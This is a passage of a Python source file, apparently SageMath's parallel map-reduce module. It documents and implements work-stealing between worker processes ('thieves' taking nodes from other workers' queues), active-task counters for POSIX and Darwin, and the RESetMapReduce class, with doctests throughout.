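It uses plain threads, deques and a shared counter instead of Sage's
processes, pipes and request queues, and it only illustrates the control flow
described above (take from the top of one's own stack, steal from the bottom
of a random victim, stop when no work is left); it is *not* the actual code of
:meth:`RESetMapReduceWorker.steal`::

    import random
    import threading
    import time
    from collections import deque

    MAXLEN = 4           # the running example of this module uses 16
    NWORKERS = 2

    def children(word):
        return [word + [0], word + [1]] if len(word) < MAXLEN else []

    todos = [deque() for _ in range(NWORKERS)]
    todos[0].append([])                # the single root goes to worker 0
    locks = [threading.Lock() for _ in range(NWORKERS)]
    pending = [1]                      # number of nodes not processed yet
    pending_lock = threading.Lock()
    counts = [0] * NWORKERS            # per-worker partial reduction (counting)

    def worker(me):
        while True:
            node = None
            with locks[me]:
                if todos[me]:
                    node = todos[me].pop()           # own work: take from the top
            if node is None:
                victim = random.randrange(NWORKERS)  # choose a victim at random
                with locks[victim]:
                    if todos[victim]:
                        node = todos[victim].popleft()   # steal from the bottom
            if node is None:
                with pending_lock:
                    if pending[0] == 0:              # no work left anywhere: stop
                        return
                time.sleep(0.001)                    # idle; retry the steal
                continue
            kids = children(node)
            with locks[me]:
                todos[me].extend(kids)               # push children on own stack
            with pending_lock:
                pending[0] += len(kids) - 1
            counts[me] += 1                          # map_function is lambda x: 1

    threads = [threading.Thread(target=worker, args=(i,))
               for i in range(NWORKERS)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(sum(counts))                               # 31 binary words of length <= 4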
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread`, which we call ``T`` for "thief", that acts like a kind of
Trojan horse during a theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen, depending on whether the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The end of the task is immediately signaled to the
master through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before it ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
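To get a feel for the counter that drives this termination detection, one can
experiment with it directly; this small sketch mimics two workers finishing
their tasks, the last call reaching zero being what triggers
``master._shutdown`` in the real protocol::

    from sage.parallel.map_reduce import ActiveTaskCounter

    counter = ActiveTaskCounter(2)   # two tasks are currently active
    counter.task_done()              # first worker finishes, returns 1
    if counter.task_done() <= 0:     # second worker finishes, returns 0
        print("no active task left: the master can shut everything down")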
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantics.
Indeed, on these systems, acquire may fail and return False not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using Semaphores impossible
on macOS so that on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using a
non-standard communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
# ****************************************************************************
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
import copy
import sys
import random
import queue
import ctypes
import logging
import multiprocessing as mp
from collections import deque
from threading import Thread
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
logger = logging.getLogger(__name__)
logger.__doc__ = ("""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
# Set up a multiprocessing context to use for this module (using the
# 'fork' start method, which is basically the same behavior as on Python 2).
mp = mp.get_context('fork')
def proc_number(max_proc=None):
r"""
Return the number of processes to use.
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations.
This is used both as exception or as abort message.
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin():
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is essentially a semaphore, but Darwin OSes
do not correctly implement POSIX's semaphore semantic. So we use
a shared integer with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Value(ctypes.c_int, task_number)
self._lock = mp.Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary, but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix():
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is the standard implementation on POSIX
compliant OSes. We essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need in keeping the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet(
[[]],
lambda l: ([l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)]
if len(l) < NNN else []),
structure='forest',
enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen of runs, I got:
- Posix compliant implementation: 17.04 s
- Darwin implementation: 18.26 s
So there is a non-negligible overhead. It will probably be worth it
if we try to cythonize the code, so I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary, but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test whether the semaphore counting the number of active tasks
# would become negative. This should not happen in normal
# computations. However, in case of an abort, the semaphore is
# artificially set to 0 to stop the computation, so this check is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce():
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet_forest`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- the roots of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default: ``None``)
- ``reduce_function=red`` -- (default: ``None``)
- ``reduce_init=init`` -- (default: ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
roots=None,
children=None,
post_process=None,
map_function=None,
reduce_function=None,
reduce_init=None,
forest=None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce([[]], lambda: [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None:
self._roots = roots
if children is not None:
self.children = children
if post_process is not None:
self.post_process = post_process
if map_function is not None:
self.map_function = map_function
if reduce_function is not None:
self.reduce_function = reduce_function
if reduce_init is not None:
self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
Return the forest underlying the map-reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest',
enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``.
OUTPUT:
An iterable of nodes.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the function mapped by ``self``.
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reducer function for ``self``.
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
By default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a + b
def post_process(self, a):
r"""
Return the image of ``a`` under the post-processing function for ``self``.
INPUT:
- ``a`` -- a node
With the default post-processing function, which is the identity function,
this returns ``a`` itself.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction.
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Setup the communication channels.
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce their work
locally or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = mp.Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = mp.Lock()
# We use lock=False here, as a compromise, to avoid deadlocking when a
# subprocess holding a lock is terminated. (:trac:`33236`)
self._aborted = mp.Value(ctypes.c_bool, False, lock=False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers.
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: def children(x):
....: print(f"Starting: {x}", flush=True)
....: sleep(float(0.5))
....: print(f"Finished: {x}", flush=True)
....: return []
sage: S = RESetMapReduce(roots=[1, 2], children=children)
sage: S.setup_workers(2)
sage: S.start_workers(); sleep(float(0.4))
Starting: ...
Starting: ...
sage: [w.is_alive() for w in S._workers]
[True, True]
sage: sleep(float(1.5))
Finished: ...
Finished: ...
sage: [not w.is_alive() for w in S._workers]
[True, True]
Cleanup::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers:
w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue.
OUTPUT:
The reduction of the results of all the workers, that is, the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Communication statistics are gathered before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s" % worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s" % worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanup::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Shutdown the workers.
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanup::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task.
Used by the worker to signal that a new task is starting. As soon as
        there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an :exc:`AbortError`::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a task is done.
Used by the worker to signal that a task is done. As soon as
        there are no more active tasks, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator(
....: [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
        # We test whether the semaphore counting the number of active tasks
        # becomes negative. This should not happen in normal computations.
        # However, in case of abort, we artificially set the semaphore to 0 to
        # stop the computation, so this check is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker.
OUTPUT:
A worker for ``self`` chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker...RESetMapReduceWorker-... initial...>
sage: EX.random_worker() in EX._workers
True
Cleanup::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers) - 1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations.
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
The result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timeout.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
        Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=float(0.01))
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile = profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classic trick to have a local variable shared with the
# local function (see e.g:
# https://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += ("\n" + name + " ".join(
"%4i" % (self._stats[i][ist]) for i in range(start, end)))
for start in range(0, self._nprocess, blocksize):
end = min(start + blocksize, self._nprocess)
res[0] = ("#proc: " +
" ".join("%4i" % (i) for i in range(start, end)))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Run the computation serially (mostly for tests).
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(mp.Process):
"""
Worker for generate-map-reduce.
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
    - ``reduce_locally`` -- when to reduce the results. Two possible values
      are supported:
      * ``True`` -- the reducing work is done entirely locally; the result is
        only sent back at the end of the work. This ensures the lowest level
        of communication.
      * ``False`` -- results are sent back after each finished branch, when
        the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker...RESetMapReduceWorker-... initial...>
"""
mp.Process.__init__(self)
self._iproc = iproc
self._todo = deque()
self._request = mp.SimpleQueue() # Faster than Queue
        # Currently it is not possible to have two simultaneous reads or writes
        # on the following Pipe, so there is no need for a queue.
self._read_task, self._write_task = mp.Pipe(duplex=False)
self._mapred = mapred
self._stats = mp.RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
Return the thief thread of this worker process.
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs += 1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s" % target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s" % target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s" % target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
            assert len(self._todo) == 0, "Bad stop: the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
A node stolen from another worker chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start() # known bug (Trac #27537)
sage: w1.steal() # known bug (Trac #27537)
42
sage: w0._todo # known bug (Trac #27537)
deque([])
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s" % victim.name)
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting for steal answer from %s" % victim.name)
node = self._read_task.recv()
# logger.debug("Request answer: %s" % (node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s" % (node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker.
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(int(1))
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..." % output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker.
EXAMPLES::
